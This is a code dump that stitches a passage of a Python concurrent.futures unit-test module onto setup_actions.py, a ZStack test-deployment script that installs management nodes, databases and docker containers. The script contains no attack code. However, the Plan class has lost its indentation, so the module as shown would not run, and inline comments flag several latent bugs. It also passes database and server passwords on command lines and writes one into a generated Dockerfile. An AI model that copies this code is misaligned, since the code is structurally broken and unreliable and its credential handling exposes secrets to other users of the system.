        self.assertEqual(f2._state, RUNNING)
        self.assertTrue(f3.cancel())
        self.assertEqual(f3._state, CANCELLED)
        self.assertTrue(f4.cancel())
        self.assertEqual(f4._state, CANCELLED_AND_NOTIFIED)
        self.assertFalse(f5.cancel())
        self.assertEqual(f5._state, FINISHED)
        self.assertFalse(f6.cancel())
        self.assertEqual(f6._state, FINISHED)
    def test_cancelled(self):
        self.assertFalse(PENDING_FUTURE.cancelled())
        self.assertFalse(RUNNING_FUTURE.cancelled())
        self.assertTrue(CANCELLED_FUTURE.cancelled())
        self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.cancelled())
        self.assertFalse(EXCEPTION_FUTURE.cancelled())
        self.assertFalse(SUCCESSFUL_FUTURE.cancelled())
    def test_done(self):
        self.assertFalse(PENDING_FUTURE.done())
        self.assertFalse(RUNNING_FUTURE.done())
        self.assertTrue(CANCELLED_FUTURE.done())
        self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.done())
        self.assertTrue(EXCEPTION_FUTURE.done())
        self.assertTrue(SUCCESSFUL_FUTURE.done())
    def test_running(self):
        self.assertFalse(PENDING_FUTURE.running())
        self.assertTrue(RUNNING_FUTURE.running())
        self.assertFalse(CANCELLED_FUTURE.running())
        self.assertFalse(CANCELLED_AND_NOTIFIED_FUTURE.running())
        self.assertFalse(EXCEPTION_FUTURE.running())
        self.assertFalse(SUCCESSFUL_FUTURE.running())
    def test_result_with_timeout(self):
        self.assertRaises(futures.TimeoutError,
                          PENDING_FUTURE.result, timeout=0)
        self.assertRaises(futures.TimeoutError,
                          RUNNING_FUTURE.result, timeout=0)
        self.assertRaises(futures.CancelledError,
                          CANCELLED_FUTURE.result, timeout=0)
        self.assertRaises(futures.CancelledError,
                          CANCELLED_AND_NOTIFIED_FUTURE.result, timeout=0)
        self.assertRaises(OSError, EXCEPTION_FUTURE.result, timeout=0)
        self.assertEqual(SUCCESSFUL_FUTURE.result(timeout=0), 42)
    def test_result_with_success(self):
        # TODO(brian@sweetapp.com): This test is timing dependent.
        def notification():
            # Wait until the main thread is waiting for the result.
            time.sleep(1)
            f1.set_result(42)
        f1 = create_future(state=PENDING)
        t = threading.Thread(target=notification)
        t.start()
        self.assertEqual(f1.result(timeout=5), 42)
    def test_result_with_cancel(self):
        # TODO(brian@sweetapp.com): This test is timing dependent.
        def notification():
            # Wait until the main thread is waiting for the result.
            time.sleep(1)
            f1.cancel()
        f1 = create_future(state=PENDING)
        t = threading.Thread(target=notification)
        t.start()
        self.assertRaises(futures.CancelledError, f1.result, timeout=5)
    def test_exception_with_timeout(self):
        self.assertRaises(futures.TimeoutError,
                          PENDING_FUTURE.exception, timeout=0)
        self.assertRaises(futures.TimeoutError,
                          RUNNING_FUTURE.exception, timeout=0)
        self.assertRaises(futures.CancelledError,
                          CANCELLED_FUTURE.exception, timeout=0)
        self.assertRaises(futures.CancelledError,
                          CANCELLED_AND_NOTIFIED_FUTURE.exception, timeout=0)
        self.assertTrue(isinstance(EXCEPTION_FUTURE.exception(timeout=0),
                                   OSError))
        self.assertEqual(SUCCESSFUL_FUTURE.exception(timeout=0), None)
    def test_exception_with_success(self):
        def notification():
            # Wait until the main thread is waiting for the exception.
            time.sleep(1)
            with f1._condition:
                f1._state = FINISHED
                f1._exception = OSError()
                f1._condition.notify_all()
        f1 = create_future(state=PENDING)
        t = threading.Thread(target=notification)
        t.start()
        self.assertTrue(isinstance(f1.exception(timeout=5), OSError))
@test_support.reap_threads
def test_main():
    # Run every TestCase in this module; always reap child processes the
    # process-pool tests may have left behind, even on failure.
    try:
        test_support.run_unittest(__name__)
    finally:
        test_support.reap_children()
if __name__ == "__main__":
    test_main()
|
setup_actions.py | '''
@author: Frank
'''
import os.path
import zstacklib.utils.xmlobject as xmlobject
import zstacklib.utils.linux as linux
import zstacklib.utils.shell as shell
import zstacklib.utils.log as log
import zstacklib.utils.lock as lock
import zstacklib.utils.ssh as ssh
import zstacklib.utils.http as http
import apibinding.api as api
import apibinding.inventory as inventory
import socket
import time
import os
import sys
import signal
import tempfile
import threading
import traceback
import zstackwoodpecker.operations.resource_operations as res_ops
import zstackwoodpecker.operations.node_operations as node_ops
import zstackwoodpecker.ansible as ansible
import zstacktestagent.plugins.host as host_plugin
import zstacktestagent.testagent as testagent
logger = log.get_logger(__name__)
#This path should be aligned with Dockerfile
docker_apache_path = '/usr/local/zstack'
# Seconds allowed for the docker daemon to become responsive.
docker_service_start_timeout = 3
DEFAULT_PYPI_URL = 'https://pypi.python.org/simple/'
# PyPI mirror override, falling back to the public index.
ENV_PYPI_URL = os.environ.get('ZSTACK_PYPI_URL')
if not ENV_PYPI_URL:
    ENV_PYPI_URL = DEFAULT_PYPI_URL
USER_PATH = os.path.expanduser('~')
NODE_ANSIBLE_YAML = '%s/.zstackwoodpecker/ansible/node.yaml' % USER_PATH
#avoid of using http_proxy to impact zstack HTTP API request.
ENV_HTTP_PROXY = os.environ.get('woodpecker_http_proxy')
if not ENV_HTTP_PROXY:
    ENV_HTTP_PROXY = ''
ENV_HTTPS_PROXY = os.environ.get('woodpecker_https_proxy')
if not ENV_HTTPS_PROXY:
    ENV_HTTPS_PROXY = ''
NODE_PASSWORD = os.environ.get('ZSTACK_MANAGEMENT_SERVER_PASSWORD')
EXTRA_DEPLOY_SCRIPT = '%s/.zstackwoodpecker/extra_zstack_config.sh' % USER_PATH
# Shared list where node-worker threads record sys.exc_info() tuples so the
# main thread can report failures from background work.
node_exception = []
# Raised by the deploy actions below on environment/validation failures.
class ActionError(Exception):
    '''action error'''
def shell_cmd_thread(shell_cmd, ignore_exception = False):
    """Run *shell_cmd* via shell.call; intended as a Thread target.

    On failure, unless *ignore_exception* is set, the sys.exc_info() tuple
    is appended to the module-level ``node_exception`` list (so the main
    thread can see failures from worker threads) and the exception is
    re-raised. With *ignore_exception* the failure is swallowed.
    """
    try:
        shell.call(shell_cmd)
    except Exception:
        if not ignore_exception:
            node_exception.append(sys.exc_info())
            # BUGFIX: bare `raise` re-raises with the original traceback;
            # the previous `raise e` discarded it (Python 2 semantics).
            raise
def restart_zstack_without_deploy_db(test_config_path):
    '''
    This API could be called, when zstack.war is rebuilt.
    It will find all running nodes and deploy zstack.war to them.
    '''
    # Imported lazily to avoid a circular import with zstackwoodpecker.
    import zstackwoodpecker.test_util as test_util
    test_config_obj = test_util.TestConfig(test_config_path)
    all_config = test_config_obj.get_deploy_config()
    plan = Plan(all_config)
    plan.restart_war_on_all_nodes()
class Node(object):
    '''
    Node super class: one zstack management node (tomcat + zstack.war).

    Holds the paths derived from the test plan (catalina home, war path,
    properties files) and knows how to rewrite zstack.properties for the
    configured DB / rabbitmq servers. Subclasses implement the actual
    start/stop transport (ssh host, docker container).
    '''
    def __init__(self, plan_config):
        self.node_ip = None
        self.catalina_home = None
        self.start_script = None
        self.stop_script = None
        self.webapps_path = None
        self.src_war_path = None
        self.war_path = None
        self.war_folder = None
        self.dst_zstack_properties = None
        self.dst_cloudbus_properties = None
        self.db_server = None
        self.db_port = None
        self.rabbitmq_server = None
        #Need cleanup following 2 properties files after operations.
        self.node_zstack_properties = None
        self.node_cloudbus_properties = None
        self._parse_node_config(plan_config)
    def _parse_node_config(self, test_plan):
        # Order matters: war-path derivation needs webapps_path (set by
        # _set_catalina_home) and the properties rewrite needs db/rabbitmq.
        self._set_catalina_home(test_plan.catalina_home)
        self._set_db_server(test_plan.db_server)
        self._set_db_port(test_plan.db_port)
        self._set_rabbitmq_server(test_plan.rabbitmq_server)
        self._set_war_path(test_plan.war_path)
        self._prepare_zstack_properties(test_plan.zstack_properties)
        #self._prepare_cloudbus_properties()
    def set_node_ip(self, node_ip):
        self.node_ip = node_ip
        #need to manually set nodeName
        shell.ShellCmd("echo 'management.server.ip=%s' >> %s" % (self.node_ip, self.node_zstack_properties))()
    def _set_catalina_home(self, catalina_home):
        self.catalina_home = catalina_home
        self.start_script = os.path.join(self.catalina_home, 'bin', 'startup.sh')
        self.stop_script = os.path.join(self.catalina_home, 'bin', 'shutdown.sh')
        self.webapps_path = os.path.join(self.catalina_home, 'webapps')
    def _set_war_path(self, src_war_path):
        self.src_war_path = src_war_path
        self.war_path = os.path.join(self.webapps_path, os.path.basename(self.src_war_path))
        # BUGFIX: the original used self.war_path.strip('.war'), which strips
        # any of the characters {., w, a, r} from both ends (e.g. a war named
        # 'raw.war' collapses to an empty basename), not the '.war' suffix.
        # Remove the suffix explicitly instead.
        if self.war_path.endswith('.war'):
            self.war_folder = self.war_path[:-len('.war')]
        else:
            self.war_folder = self.war_path
        self.dst_zstack_properties = os.path.join(self.war_folder, 'WEB-INF/classes/zstack.properties')
        self.dst_cloudbus_properties = os.path.join(self.war_folder, 'WEB-INF/classes/springConfigXml/CloudBus.xml')
    def _set_db_server(self, db_server):
        self.db_server = db_server
    def _set_db_port(self, db_port):
        self.db_port = db_port
    def _set_rabbitmq_server(self, rabbitmq_server):
        self.rabbitmq_server = rabbitmq_server
    def _prepare_zstack_properties(self, zstack_properties=None):
        # Copy the template properties to a temp file and point it at the
        # configured DB / rabbitmq servers; the temp file is removed by
        # cleanup().
        if not zstack_properties:
            self.zstack_properties = self.dst_zstack_properties
        else:
            self.zstack_properties = zstack_properties
        handler, tmpfile = tempfile.mkstemp()
        # BUGFIX: copy from self.zstack_properties, not the raw argument --
        # when no explicit file was given the argument is None and the
        # command would have been "cp -f None <tmpfile>".
        shell.ShellCmd("/bin/cp -f %s %s" % \
                (self.zstack_properties, tmpfile))()
        #change db server
        shell.ShellCmd("sed -i 's#mysql://localhost:3306#mysql://%s:%s#' %s" %\
                (self.db_server, self.db_port, tmpfile))()
        #change rabbitmq server
        shell.ShellCmd("sed -i 's#CloudBus.serverIp.0 = localhost#CloudBus.serverIp.0 = %s#' %s" % (self.rabbitmq_server, tmpfile))()
        #Remove management.server.ip, if existing.
        shell.ShellCmd("sed -i '/management.server.ip=.*/d' %s" % tmpfile)()
        self.node_zstack_properties = tmpfile
    def _prepare_cloudbus_properties(self):
        # NOTE(review): self.master_name is never assigned anywhere in this
        # class -- this (currently unused) method would raise AttributeError.
        handler, tmpfile = tempfile.mkstemp()
        shell.ShellCmd("/bin/cp -f %s %s" % \
                (self.dst_cloudbus_properties, tmpfile))()
        shell.ShellCmd("sed -i 's/localhost/%s/' %s" % \
                (self.master_name, tmpfile))()
        self.node_cloudbus_properties = tmpfile
    def start_node(self):
        print('Deloying war %s to tomcat in node: %s ...' % \
                (self.src_war_path, self.node_ip))
    def stop_node(self):
        print('Stop tomcat in node: %s ...' % self.node_ip)
    #must be called before exit Node operations.
    def cleanup(self):
        if os.path.exists(self.node_zstack_properties):
            os.remove(self.node_zstack_properties)
        #if os.path.exists(self.node_cloudbus_properties):
        #    os.remove(self.node_cloudbus_properties)
    def wait_for_node_start(self):
        pass
class HostNode(Node):
    '''
    Node on real exist host.
    '''
    def __init__(self, test_plan):
        super(HostNode, self).__init__(test_plan)
        # ssh credentials for the remote host running tomcat.
        self.node_username = None
        self.NODE_PASSWORD = None
    def set_username(self, username):
        self.node_username = username
    def set_password(self, password):
        self.NODE_PASSWORD = password
    def _rshell(self, cmd):
        # Run *cmd* on the remote node over ssh.
        ssh.execute(cmd, self.node_ip, self.node_username, self.NODE_PASSWORD)
    def prepare_node(self):
        # Tar up the local catalina tree once (cached), then build the
        # ansible command line that will push it to the node.
        catalina_root = os.path.dirname(self.catalina_home)
        catalina_tar_name = 'zstack_woodpecker_apache.tgz'
        catalina_real_path = os.path.realpath(self.catalina_home)
        catalina_real_name = os.path.basename(catalina_real_path)
        catalina_real_root = os.path.dirname(catalina_real_path)
        catalina_tar = '%s/%s' % (catalina_real_root, catalina_tar_name)
        if not os.path.exists(catalina_tar):
            os.system("cd %s; tar -zcf %s --exclude='logs/*' --exclude='webapps/zstack*' %s" % \
                    (catalina_real_root, catalina_tar_name, catalina_real_name))
        ansible_cmd_args = "host=%s catalina_root=%s catalina_folder=%s \
                catalina_tar=%s zstack_war=%s zstack_properties=%s pypi_url=%s" % \
                (self.node_ip, catalina_root, self.catalina_home, catalina_tar, \
                self.src_war_path, self.node_zstack_properties, ENV_PYPI_URL)
        if ENV_HTTP_PROXY:
            ansible_cmd_args = "%s http_proxy=%s https_proxy=%s" % \
                    (ansible_cmd_args, ENV_HTTP_PROXY, ENV_HTTPS_PROXY)
        self.ansible_cmd = "%s -e '%s'" % (NODE_ANSIBLE_YAML, ansible_cmd_args)
    def start_node(self):
        # Failures are recorded in node_exception for the caller; this method
        # itself never raises (it runs on a worker thread).
        try:
            super(HostNode, self).start_node()
            self.stop_node()
            ansible_dir = os.path.dirname(NODE_ANSIBLE_YAML)
            ansible.execute_ansible(self.node_ip, self.node_username, \
                    self.NODE_PASSWORD, ansible_dir, self.ansible_cmd)
            start_node_cmd = 'export CATALINA_OPTS=" -Djava.net.preferIPv4Stack=true "; sh ' + self.start_script
            if self.NODE_PASSWORD:
                start_node_cmd = 'export ZSTACK_MANAGEMENT_SERVER_PASSWORD=%s; %s'\
                        % (self.NODE_PASSWORD, start_node_cmd)
            self._rshell(start_node_cmd)
        except Exception as e:
            node_exception.append(sys.exc_info())
    def stop_node(self):
        # Graceful shutdown via shutdown.sh, then pkill -9 java if anything
        # is still alive after a short grace period.
        super(HostNode, self).stop_node()
        self._rshell('sh %s; \
                ps -aef|grep java|grep -v grep; \
                if [ $? -ne 0 ]; then \
                    sleep 1; \
                    ps -aef|grep java|grep -v grep;\
                    if [ $? -ne 0 ]; \
                        then pkill -9 java || true; \
                    fi; \
                fi;' % \
                self.stop_script)
class DockerNode(Node):
    '''
    Node running in Docker
    '''
    def __init__(self, test_plan):
        #Only CentOS and Ubuntu supported docker at present.
        try:
            shell.ShellCmd('docker -v')()
        except:
            traceback.print_exc(file=sys.stdout)
            # NOTE(review): `node` is not defined in this scope -- if docker
            # is missing this line raises NameError instead of ActionError.
            raise ActionError('Did not find docker command. Can not run \
                    multi nowith dockerimage: %s.' % node.dockerImage_)
        #check docker image
        super(DockerNode, self).__init__(test_plan)
        self.docker_image = None
        self.br_dev = None
        # Scratch dir for the generated Dockerfile; removed in cleanup().
        self.docker_folder = tempfile.mkdtemp()
        zones_obj = test_plan.config.deployerConfig.zones
        zones = zones_obj.get_child_node_as_list('zone')
        net_dev = zones[0].l2Networks.l2NoVlanNetwork.physicalInterface__
        br_dev = 'br_%s' % net_dev
        self.set_br_dev(br_dev)
    def cleanup(self):
        super(DockerNode, self).cleanup()
        if os.path.exists(self.docker_folder):
            os.system('rm -rf %s' % self.docker_folder)
    def set_br_dev(self, br_dev):
        self.br_dev = br_dev
    def set_docker_image(self, docker_image):
        try:
            shell.ShellCmd('docker images|grep %s' % docker_image)()
        except:
            traceback.print_exc(file=sys.stdout)
            raise ActionError('Did not find docker image: %s by command: \
                    `docker image`' % docker_image)
        self.docker_image = docker_image
    def _setup_docker_bridge(self):
        #enable bridge. use default l2network setting.
        # NOTE(review): self.br_dev already carries the 'br_' prefix (set in
        # __init__), so this produces 'br_br_<dev>' -- looks like a bug;
        # confirm against the intended bridge name before relying on it.
        br_dev = 'br_%s' % self.br_dev
        if not linux.is_bridge(br_dev):
            linux.create_bridge(br_dev, br_dev)
        #set docker args
        rhel_docker_config = '/etc/sysconfig/docker'
        ubuntu_docker_config = '/etc/default/docker'
        # NOTE(review): open(..., 'w') truncates the existing docker config,
        # discarding any other daemon options that were set there.
        if os.path.exists(rhel_docker_config):
            open(rhel_docker_config, 'w').write('other_args="-b=%s"' % br_dev)
            shell.ShellCmd('service docker restart')()
        if os.path.exists(ubuntu_docker_config):
            open(ubuntu_docker_config, 'w').write('other_args="-b=%s"' % \
                    br_dev)
            shell.ShellCmd('service docker restart')()
    def _prepare_docker_image(self):
        #prepare new docker image with right ip address zstack.war, properties
        shell.ShellCmd('cp -a %s %s' % (self.node_zstack_properties, \
                self.docker_folder))()
        #shell.ShellCmd('cp -a %s %s' % (self.node_cloudbus_properties, \
        #        self.docker_folder))()
        shell.ShellCmd('cp -a %s %s' % (self.war_folder, \
                self.docker_folder))()
        dockerfile_content = ["FROM %s" % self.docker_image]
        dockerfile_content.append("RUN rm -rf %s" % self.war_folder)
        dockerfile_content.append("ADD %s %s" % \
                (os.path.basename(self.war_folder), self.war_folder))
        dockerfile_content.append("ADD %s %s" % \
                (os.path.basename(self.node_zstack_properties), \
                self.dst_zstack_properties))
        #dockerfile_content.append("ADD %s %s" % \
        #        (os.path.basename(self.node_cloudbus_properties), \
        #        self.dst_cloudbus_properties))
        if NODE_PASSWORD:
            dockerfile_content.append('CMD \
                    export CATALINA_OPTS="-Djava.net.preferIPv4Stack=true" && \
                    export ZSTACK_MANAGEMENT_SERVER_PASSWORD="%s" && \
                    ifconfig eth0 %s && export ZSTACK_BUILT_IN_HTTP_SERVER_IP=%s && \
                    /bin/sh %s/apache-tomcat/bin/startup.sh \
                    && tail -f %s/apache-tomcat/logs/catalina.out ' % (NODE_PASSWORD, \
                    self.node_ip, self.node_ip, docker_apache_path, \
                    docker_apache_path))
        else:
            dockerfile_content.append('CMD \
                    export CATALINA_OPTS="-Djava.net.preferIPv4Stack=true" && \
                    ifconfig eth0 %s && export ZSTACK_BUILT_IN_HTTP_SERVER_IP=%s && \
                    /bin/sh %s/apache-tomcat/bin/startup.sh \
                    && tail -f %s/apache-tomcat/logs/catalina.out ' % (self.node_ip, \
                    self.node_ip, docker_apache_path, docker_apache_path))
        open(os.path.join(self.docker_folder, 'Dockerfile'), \
                'w').write('\n'.join(dockerfile_content))
        print 'Dockerfile is prepared.'
    def prepare_node(self):
        self._setup_docker_bridge()
        self._prepare_docker_image()
    def start_node(self):
        # Wait for the docker daemon, build an image tagged with the node ip,
        # then run it detached. Failures are recorded in node_exception.
        def _wait(data):
            try:
                shell.ShellCmd('docker ps')()
                print('docker service is ready')
                return True
            except:
                print ('docker service is still starting ...')
                return False
        try:
            if not linux.wait_callback_success(_wait, None, \
                    docker_service_start_timeout, 0.1):
                raise ActionError('waiting for docker start up time out: %s' % \
                        docker_service_start_timeout)
            shell.ShellCmd('cd %s ; docker build --tag="%s" .' % \
                    (self.docker_folder, self.node_ip))()
            #run docker image
            shell.ShellCmd("docker run -d %s " % self.node_ip)()
            print 'docker container has been created.'
        except Exception as e:
            node_exception.append(sys.exc_info())
    def stop_node(self):
        # Stop and remove any container/image tagged with this node's ip;
        # '|| true' keeps this idempotent when nothing is running.
        shell.ShellCmd("docker stop \
                `docker ps -a|grep %s|awk '{print $1}'`|| true" \
                % self.node_ip)()
        shell.ShellCmd("docker rm \
                `docker ps -a|grep %s|awk '{print $1}'`|| true" \
                % self.node_ip)()
        shell.ShellCmd("docker rmi %s || true" % self.node_ip)()
class Plan(object):
def _full_path(self, path):
if path.startswith('~'):
return os.path.expanduser(path)
elif path.startswith('/'):
return path
else:
return os.path.join(self.plan_base_path, path)
def _set_and_validate_config(self):
    """Read basicConfig/deployerConfig from the parsed deploy XML.

    Resolves all paths, applies defaults, exports ZSTACK_HOME and
    ZSTACK_BUILT_IN_HTTP_SERVER_IP, and raises ActionError on any
    missing mandatory setting.
    """
    basic_config = self.config.basicConfig
    deploy_config = self.config.deployerConfig
    self.zstack_pkg = self._full_path(basic_config.zstackPkg.text_)
    self.zstack_install_script = \
            self._full_path(basic_config.zstackInstallScript.text_)
    if not os.path.exists(self.zstack_pkg):
        raise ActionError('unable to find %s for ZStack binary' \
                % self.zstack_pkg)
    # NOTE(review): `basic_config.hasattr(...)` (xmlobject-style accessor)
    # is used here, while builtin hasattr(basic_config, ...) is used further
    # down -- confirm both forms are supported by the xmlobject wrapper.
    if basic_config.hasattr('zstackInstallPath'):
        self.install_path = \
                self._full_path(basic_config.zstackInstallPath.text_)
    else:
        raise ActionError(\
                'need to set config.deployerConfig.zstackInstallPath in : %s' % self.deploy_config_path)
    #set ZSTACK_HOME, which will be used by zstack-ctl
    os.environ['ZSTACK_HOME'] = '%s/apache-tomcat/webapps/zstack/' % \
            self.install_path
    if basic_config.hasattr('testAgent'):
        self.test_agent_path = self._full_path(basic_config.testAgent.text_)
        linux.error_if_path_missing(self.test_agent_path)
        # Collect every KVM host as a test-agent deployment target.
        for zone in deploy_config.zones.get_child_node_as_list('zone'):
            for cluster in zone.clusters.get_child_node_as_list('cluster'):
                if cluster.hypervisorType_ == inventory.KVM_HYPERVISOR_TYPE:
                    for h in cluster.hosts.get_child_node_as_list('host'):
                        h.managementIp_
                        h.username_
                        h.password_
                        # will raise exception if one of above not specified in xml filea.
                        self.test_agent_hosts.append(h)
    else:
        if xmlobject.has_element(basic_config, 'testAgentHost'):
            raise ActionError('<tesgAgent> is missing while <testAgentHost> presents')
    self.catalina_home = self.install_path + '/apache-tomcat'
    # Management node startup timeout; defaults to 120s when unset.
    self.wait_for_start_timeout = basic_config.get('managementServerStartTimeout')
    if not self.wait_for_start_timeout:
        self.wait_for_start_timeout = 120
    else:
        self.wait_for_start_timeout = int(self.wait_for_start_timeout)
    if hasattr(basic_config, 'rabbitmq'):
        self.rabbitmq_server = basic_config.rabbitmq.get('server', 'localhost')
        self.rabbitmq_server_root_passwd = basic_config.rabbitmq.get('password', '')
        if not self.rabbitmq_server_root_passwd:
            print ('!!!WARN! Rabbitmq server root password are not set!')
    else:
        raise ActionError('need to set config.basicConfig.rabbitmq.server in: %s' % self.deploy_config_path)
    if hasattr(basic_config, 'db'):
        self.need_deploy_db = True
        self.db_server = basic_config.db.get('server', 'localhost')
        self.db_username = basic_config.db.get('username', 'zstack')
        self.db_password = basic_config.db.get('password', '')
        self.db_admin_username = basic_config.db.get('admin', 'root')
        self.db_admin_password = basic_config.db.get('adminPassword', '')
        self.db_server_root_password = basic_config.db.get('server_root_password', '')
        if not self.db_server_root_password:
            print ('!!!WARN! Database server root password are not set!')
        self.db_port = basic_config.db.get('port', '3306')
    if basic_config.has_element('zstackProperties'):
        if basic_config.zstackProperties.text_:
            self.zstack_properties = self._full_path(basic_config.zstackProperties.text_)
            # Fall back to the packaged default when the file is missing.
            if not os.path.exists(self.zstack_properties):
                print('unable to find zstackProperties at %s, use \
default one' % self.zstack_properties)
                self.zstack_properties = None
    os.environ['ZSTACK_BUILT_IN_HTTP_SERVER_IP'] = ''
    # Pick the built-in HTTP server IP: prefer a node IP that exists on
    # this machine, otherwise fall back to the first node IP seen.
    if deploy_config.has_element('nodes') \
            and deploy_config.nodes.has_element('node'):
        for node in deploy_config.nodes.get_child_node_as_list('node'):
            node.ip_
            self.nodes.append(node)
            if linux.is_ip_existing(node.ip_):
                os.environ['ZSTACK_BUILT_IN_HTTP_SERVER_IP'] = node.ip_
            elif not os.environ.get('ZSTACK_BUILT_IN_HTTP_SERVER_IP'):
                os.environ['ZSTACK_BUILT_IN_HTTP_SERVER_IP'] = node.ip_
    else:
        raise ActionError('deploy.xml setting error. No deployerConfig.nodes.node is found. ')
    if not os.environ.get('ZSTACK_BUILT_IN_HTTP_SERVER_IP'):
        raise ActionError('deploy.xml setting error. No deployerConfig.nodes.node.ip is defined. ')
def _deploy_zstack_properties(self):
    """Copy the configured zstack.properties into the deployed webapp.

    No-op when no properties file was configured or it was missing.
    """
    if self.zstack_properties:
        target = os.path.join(self.catalina_home, \
                'webapps/zstack/WEB-INF/classes/zstack.properties')
        shell.call('cp -f %s %s' % (self.zstack_properties, target))
        print('deployed zstack properties[%s] to %s' % \
                (self.zstack_properties, target))
def _extra_deployment(self):
    """Run the optional extra deployment hook script, if one is installed."""
    if not os.path.exists(EXTRA_DEPLOY_SCRIPT):
        return
    shell.call('%s %s' % (EXTRA_DEPLOY_SCRIPT, self.catalina_home))
    print('Extra deployment by %s' % EXTRA_DEPLOY_SCRIPT)
def _upgrade_local_zstack(self):
    """Upgrade the locally installed ZStack in place from the all-in-one
    package (-u), forcing the upgrade with -F."""
    #cmd = 'WEBSITE=localhost bash %s -f %s -u -r %s' % \
    #        (self.zstack_install_script, self.zstack_pkg, \
    #        self.install_path)
    #if not add -F, will break db upgrade, since we stop_node by force.
    cmd = 'bash %s -u -F' % self.zstack_pkg
    shell.call(cmd)
    self._extra_deployment()
def _install_local_zstack(self):
    """Wipe the install path and fresh-install zstack locally from the
    all-in-one package.

    Flags presumably mean: -D offline/deps mode, -z skip node start,
    -r install root, -R aliyun mirror -- TODO confirm against the
    installer's usage text. DB passwords are appended when configured.
    """
    shell.call('rm -rf %s' % self.install_path, False)
    #cmd = 'WEBSITE=localhost bash %s -f %s -r %s -a -z' % \
    #        (self.zstack_install_script, self.zstack_pkg, \
    #        self.install_path)
    #cmd = 'bash %s -D -z -r %s -m -R aliyun' % (self.zstack_pkg, self.install_path)
    cmd = 'bash %s -D -z -r %s -R aliyun' % (self.zstack_pkg, self.install_path)
    if self.db_admin_password:
        cmd = '%s -P %s' % (cmd, self.db_admin_password)
    if self.db_password:
        cmd = '%s -p %s' % (cmd, self.db_password)
    shell.call(cmd)
    #self._deploy_zstack_properties()
    self._extra_deployment()
def _set_extra_node_config(self):
    """Duplicate local zstack config to every node and pin each node's
    management.server.ip, one shell thread per node."""
    for node in self.nodes:
        ip = node.ip_
        cmd = ('zstack-ctl configure --duplicate-to-remote=%s; '
               'zstack-ctl configure --host=%s management.server.ip=%s') % (ip, ip, ip)
        worker = threading.Thread(target=shell_cmd_thread, args=(cmd,))
        worker.start()
    self._wait_for_thread_completion('set extra management node config', 10)
def _wait_for_thread_completion(self, msg, wait_time, raise_exception = True):
    """Wait up to wait_time seconds for all worker threads to finish.

    Polls threading.active_count() once per second; only the main thread
    remaining (count == 1) means completion. When a worker recorded an
    error in the global node_exception list and raise_exception is True,
    re-raise it immediately with its original traceback (py2 three-arg
    raise). The while/else raises ActionError on timeout: the else branch
    runs only when the loop exhausts without break.
    """
    end_time = wait_time
    while end_time > 0:
        if threading.active_count() == 1:
            break
        if node_exception and raise_exception:
            print 'Meet exception when: %s :' % msg
            info1 = node_exception[0][1]
            info2 = node_exception[0][2]
            raise info1, None, info2
        print 'Wait for %s ...' % msg
        time.sleep(1)
        end_time -= 1
    else:
        raise ActionError('%s failed, since it exceeds %s seconds' % \
                (msg, wait_time))
def _install_management_nodes(self):
    """Install zstack onto every remote node in parallel threads.

    Nodes whose IP exists on this machine are skipped -- the local node is
    installed separately by _install_local_zstack().
    """
    for node in self.nodes:
        if not linux.is_ip_existing(node.ip_):
            cmd = 'zstack-ctl install_management_node --force-reinstall \
--host=%s' % node.ip_
            thread = threading.Thread(target=shell_cmd_thread, args=(cmd,))
            thread.start()
        else:
            print "node: %s has been installed zstack" % node.ip_
    self._wait_for_thread_completion('install remote management node', 600)
def _upgrade_management_nodes(self):
    """Upgrade every remote management node in parallel shell threads.

    The local node (an IP existing on this machine) is skipped; it is
    upgraded by _upgrade_local_zstack().
    """
    for node in self.nodes:
        if linux.is_ip_existing(node.ip_):
            continue
        worker = threading.Thread(
                target=shell_cmd_thread,
                args=('zstack-ctl upgrade_management_node --host=%s' % node.ip_,))
        worker.start()
    self._wait_for_thread_completion('upgrade remote management node', 600)
def _start_war(self):
    """Start the tomcat instance serving the zstack war."""
    self.tomcat.start()
def _deploy_rabbitmq(self):
    """Install rabbitmq on the configured server via zstack-ctl.

    Passwordless ssh for root is set up first using the password from the
    deploy config, since zstack-ctl drives the remote host over ssh.
    """
    ssh.make_ssh_no_password(self.rabbitmq_server, 'root', \
            self.rabbitmq_server_root_passwd)
    cmd = "zstack-ctl install_rabbitmq --host=%s" % self.rabbitmq_server
    print('deploying rabbitmq ...')
    shell.call(cmd)
def _deploy_db(self, keep_db = False):
    """Install MySQL (if needed) and deploy the zstack database schema.

    :param keep_db: when True pass --keep-db to preserve existing data,
        otherwise --drop recreates the database from scratch.

    No-op when the deploy config defined no <db> section
    (self.need_deploy_db False).
    """
    if not keep_db:
        extra_opts = '--drop'
    else:
        extra_opts = '--keep-db'
    if not self.need_deploy_db:
        return
    ssh.make_ssh_no_password(self.db_server, 'root', \
            self.db_server_root_password)
    # 'zstack.mysql.password' is the literal fallback login password used
    # when no admin password was configured.
    if not self.db_admin_password:
        cmd = 'zstack-ctl install_db --host=%s --login-password=zstack.mysql.password' % self.db_server
    else:
        cmd = 'zstack-ctl install_db --host=%s \
--login-password=%s' \
                % (self.db_server, \
                self.db_admin_password)
    print('installing db ...')
    shell.call(cmd)
    cmd = 'zstack-ctl deploydb %s --host=%s' % (extra_opts, self.db_server)
    if self.db_admin_password:
        cmd = '%s --root-password=%s' % (cmd, self.db_admin_password )
    else:
        cmd = '%s --root-password=zstack.mysql.password' % cmd
    if self.db_password:
        cmd = '%s --zstack-password=%s' % (cmd, self.db_password)
    print('deploying db ...')
    shell.call(cmd)
@lock.file_lock('deploy_test_agent')
def deploy_test_agent(self, target=None):
    """Deploy zstack test agents to test hosts using ansible.

    :param target: optional single host object (managementIp/username/
        password attributes); when None, every host collected in
        self.test_agent_hosts is deployed in parallel threads and old
        zstack logs are archived first. The file lock serializes
        concurrent deployments.
    """
    print('Deploy test agent\n')
    if not self.test_agent_path:
        print('Not find test_agent. Stop deploying test agent.\n')
        return
    testagentdir = None
    try:
        def untar_test_agent():
            # Unpack the agent bundle into a temp dir and repack its
            # bundled pypi mirror for ansible to ship.
            tmpdir = tempfile.mkdtemp()
            shell.call('tar jxf %s -C %s' % (self.test_agent_path, tmpdir))
            shell.call('cd %s/zstacktestagent/; tar jcf pypi.tar.bz pypi' \
                    % tmpdir)
            return '%s/zstacktestagent' % tmpdir
        def _wait_echo(target_ip):
            # True once the deployed agent answers its echo endpoint.
            try:
                rspstr = http.json_dump_post(testagent.build_http_path(target_ip, host_plugin.ECHO_PATH))
            except:
                print('zstack-testagent does not startup, will try again ...')
                return False
            return True
        testagentdir = untar_test_agent()
        ansible.check_and_install_ansible()
